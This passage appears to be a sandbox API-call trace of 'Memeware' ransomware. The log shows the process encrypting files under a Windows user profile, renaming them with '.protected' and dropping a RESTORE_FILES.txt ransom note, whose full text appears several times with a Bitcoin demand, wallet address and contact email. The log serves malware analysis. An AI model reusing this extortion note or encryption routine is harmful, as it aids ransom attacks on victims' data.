!\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.800] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0094.800] lstrlenA (lpString="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") returned 684 [0094.800] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0094.800] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.800] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.800] CloseHandle (hObject=0xd4) returned 1 [0094.801] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0094.801] lstrcmpiW (lpString1="Temp", lpString2="Windows") returned -1 [0094.801] lstrcmpiW (lpString1="Temp", lpString2="Program Files") returned 1 [0094.801] lstrcmpiW (lpString1="Temp", lpString2="Program Files (x86)") returned 1 [0094.801] lstrcmpiW (lpString1="Temp", lpString2="$Recycle.bin") returned 1 [0094.801] lstrcmpiW (lpString1="Temp", lpString2="System Volume Information") returned 1 [0094.801] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp") returned 39 [0094.801] lstrcmpW (lpString1="Temp", lpString2=".") returned 1 [0094.801] lstrcmpW (lpString1="Temp", lpString2="..") returned 1 [0094.801] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*") returned 41 [0094.801] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0094.802] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.802] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.802] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.802] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.802] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.802] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\.") returned 41 [0094.802] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.802] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.802] lstrcmpiW (lpString1="..", lpString2="Windows") 
returned -1 [0094.802] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.802] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.802] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.802] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.802] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\..") returned 42 [0094.802] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.802] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.802] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.802] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="Windows") returned -1 [0094.802] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="Program Files") returned -1 [0094.802] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="Program Files (x86)") returned -1 [0094.802] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="$Recycle.bin") returned 1 [0094.802] lstrcmpiW (lpString1="FXSAPIDebugLogFile.txt", lpString2="System Volume Information") returned -1 [0094.802] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt") returned 62 [0094.802] StrStrIW (lpFirst="FXSAPIDebugLogFile.txt", lpSrch=".protected") returned 0x0 [0094.803] lstrcmpW (lpString1="FXSAPIDebugLogFile.txt", lpString2="RESTORE_FILES.txt") returned -1 [0094.803] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0094.803] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0094.803] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.803] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt") returned 62 [0094.803] StrStrW (lpFirst="FXSAPIDebugLogFile.txt", lpSrch=".txt") returned=".txt" [0094.803] lstrlenW (lpString=".txt") returned 4 [0094.803] lstrlenW (lpString=".txt") returned 4 [0094.803] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x0, lpOverlapped=0x0) returned 1 [0094.803] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.803] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x0, lpOverlapped=0x0) returned 1 [0094.804] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.804] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0094.804] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0094.804] CloseHandle (hObject=0xd8) returned 1 [0094.805] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt.protected") returned 72 [0094.805] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt.protected" (normalized: "c:\\users\\default\\appdata\\local\\temp\\fxsapidebuglogfile.txt.protected")) returned 1 [0094.805] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0094.805] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0094.807] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\RESTORE_FILES.txt") returned 57 [0094.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temp\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0094.807] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.807] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0094.808] lstrlenA (lpString="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") returned 684 [0094.808] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0094.808] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.808] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.808] CloseHandle (hObject=0xd4) returned 1 [0094.808] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0094.808] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Windows") returned -1 [0094.808] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Program Files") returned 1 [0094.808] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Program Files (x86)") returned 1 [0094.808] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="$Recycle.bin") returned 1 [0094.808] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="System Volume Information") returned 1 [0094.808] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files") returned 59 [0094.808] lstrcmpW (lpString1="Temporary Internet Files", lpString2=".") returned 1 [0094.808] lstrcmpW (lpString1="Temporary Internet Files", lpString2="..") returned 1 [0094.808] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*") returned 61 [0094.809] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0xffffffff [0094.809] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0094.809] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0094.809] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\RESTORE_FILES.txt") returned 52 [0094.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0094.809] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.809] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0094.810] lstrlenA (lpString="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") returned 684 [0094.810] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, 
lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0094.810] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.810] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0094.810] CloseHandle (hObject=0xb4) returned 1 [0094.811] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0094.811] lstrcmpiW (lpString1="LocalLow", lpString2="Windows") returned -1 [0094.811] lstrcmpiW (lpString1="LocalLow", lpString2="Program Files") returned -1 [0094.811] lstrcmpiW (lpString1="LocalLow", lpString2="Program Files (x86)") returned -1 [0094.811] lstrcmpiW (lpString1="LocalLow", lpString2="$Recycle.bin") returned 1 [0094.811] lstrcmpiW (lpString1="LocalLow", lpString2="System Volume Information") returned -1 [0094.811] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow") returned 37 [0094.811] lstrcmpW (lpString1="LocalLow", lpString2=".") returned 1 [0094.811] lstrcmpW (lpString1="LocalLow", lpString2="..") returned 1 [0094.811] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*") returned 39 [0094.811] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0094.812] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.812] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.812] lstrcmpiW (lpString1=".", 
lpString2="Program Files (x86)") returned -1 [0094.812] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.812] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.812] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\.") returned 39 [0094.812] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.812] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0094.812] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.812] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.812] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.812] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.812] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.812] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\..") returned 40 [0094.812] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.812] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.812] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0094.812] lstrcmpiW (lpString1="Microsoft", lpString2="Windows") returned -1 [0094.812] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files") returned -1 [0094.812] lstrcmpiW (lpString1="Microsoft", lpString2="Program Files (x86)") returned -1 [0094.812] lstrcmpiW (lpString1="Microsoft", lpString2="$Recycle.bin") returned 1 [0094.812] lstrcmpiW (lpString1="Microsoft", lpString2="System Volume Information") returned -1 [0094.812] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft") returned 47 [0094.812] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 
[0094.812] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0094.813] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\*") returned 49 [0094.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0094.814] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.814] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.814] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.814] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.814] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.814] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\.") returned 49 [0094.814] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.814] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.814] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.814] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0094.814] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0094.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\." 
(normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.814] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.814] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.814] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.814] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.814] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.814] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.815] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\..") returned 50 [0094.815] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.815] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.815] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.815] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.815] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0094.815] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0094.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\.." 
(normalized: "c:\\users\\default\\appdata\\locallow"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.815] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0094.815] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="Windows") returned -1 [0094.815] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="Program Files") returned -1 [0094.815] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="Program Files (x86)") returned -1 [0094.815] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="$Recycle.bin") returned 1 [0094.815] lstrcmpiW (lpString1="CryptnetUrlCache", lpString2="System Volume Information") returned -1 [0094.815] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache") returned 64 [0094.815] lstrcmpW (lpString1="CryptnetUrlCache", lpString2=".") returned 1 [0094.815] lstrcmpW (lpString1="CryptnetUrlCache", lpString2="..") returned 1 [0094.815] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*") returned 66 [0094.815] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0094.816] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.816] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.816] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.816] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.816] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.816] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\.") returned 66 [0094.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.816] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.816] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.816] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.816] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.816] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.816] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.816] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.816] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.816] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.816] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.816] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\..") returned 67 [0094.816] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.816] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.816] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.816] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.816] CryptGenRandom (in: 
